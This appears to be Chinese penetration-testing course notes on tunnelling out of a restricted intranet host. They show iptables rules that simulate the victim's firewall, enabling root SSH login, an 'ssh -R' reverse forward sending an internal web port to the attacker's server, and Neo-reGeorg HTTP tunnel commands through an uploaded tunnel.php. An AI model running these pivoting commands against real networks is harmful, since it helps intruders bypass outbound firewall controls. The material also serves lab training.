内网对抗-隧道技术篇防火墙组策略HTTP反向SSH转发出网穿透CrossC2解决方案

1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

SSH 隧道搭建内网穿透：（解决目标出站限制做信息收集）
注：windows也可以支持ssh，需要单独安装该服务罢了。
由于CS无SSH协议监听器配置，无法上线cs。

如：模拟Linux为被控机，配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */如：模拟Windows为被控机，配置防火墙策略：SSH 22端口放行自己的服务器记得开启ssh协议登录：
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

被控主机需支持SSH协议（Windows需要安装支持软件）
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

curL http://127.0.0.1:1234

python neoreg.py generate -k password

python3 neoreg.py -k password -u http://xx/tunnel.php

相关文章：

asp.net core 集成redis详解

数据挖掘-数据预处理

langchain 入门指南 - ReAct 模式

微软全球蓝屏带来的思考及未来战争走向

实验一 FPGA使用Verilog HDL设计选择器

【数据结构】：大厂面试经典链表OJ题目详解

【笔记-软考】层次式架构-表现层框架设计

跨域浏览器解决前端跨域问题

构建现代化农业产业服务平台的系统架构

Ruby、Python、Java 开发者必备：Codigger之软件项目体检

[数据集][目标检测]野猪检测数据集VOC+YOLO格式1000张1类别

Spring Security认证授权介绍

vue3 使用Mock

【深度学习】yolov8-seg分割训练，拼接图的分割复原

使用 Windows 应用程序 SDK 构建下一代应用程序

JavaScript-如何实现克隆(clone)函数

Android Studio：GIT提交项目到远程仓库

Angular4 模板式表单用法以及验证

CAP理论的例子讲解

C语言笔记（第一章：C语言编程）

ES6系统学习----从Apollo Client看解构赋值

HTTP--网络协议分层，http历史(二)

JavaScript学习总结——原型

Laravel5.4 Queues队列学习

magento2项目上线注意事项

Odoo domain写法及运用

PHP变量

Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目

从零到一：用Phaser.js写意地开发小游戏（Chapter 3 - 加载游戏资源）

回顾2016

京东美团研发面经

浅析微信支付：申请退款、退款回调接口、查询退款

悄悄地说一个bug

使用agvtool更改app version／build

世界编程语言排行榜2008年06月（ActionScript 挺进20强）

《TCP IP 详解卷1：协议》阅读笔记 - 第六章

​​快速排序（四）——挖坑法，前后指针法与非递归

​【原创】基于SSM的酒店预约管理系统（酒店管理系统毕业设计）

​DB-Engines 12月数据库排名： PostgreSQL有望获得「2020年度数据库」荣誉?

​MPV，汽车产品里一个特殊品类的进化过程

###51单片机学习（2）-----如何通过C语言运用延时函数设计LED流水灯

#includecmath

（10）Linux冯诺依曼结构操作系统的再次理解

(env: Windows,mp,1.06.2308310； lib: 3.2.4) uniapp微信小程序

(Python) SOAP Web Service (HTTP POST)

(PyTorch)TCN和RNN/LSTM/GRU结合实现时间序列预测

（翻译）Quartz官方教程——第一课：Quartz入门

（分类）KNN算法- 参数调优

（附源码）ssm高校升本考试管理系统 毕业设计 201631

（南京观海微电子）——COF介绍

（四）stm32之通信协议

(转)Oracle存储过程编写经验和优化措施

(转)拼包函数及网络封包的异常处理(含代码)

（转载）PyTorch代码规范最佳实践和样式指南

(自用)gtest单元测试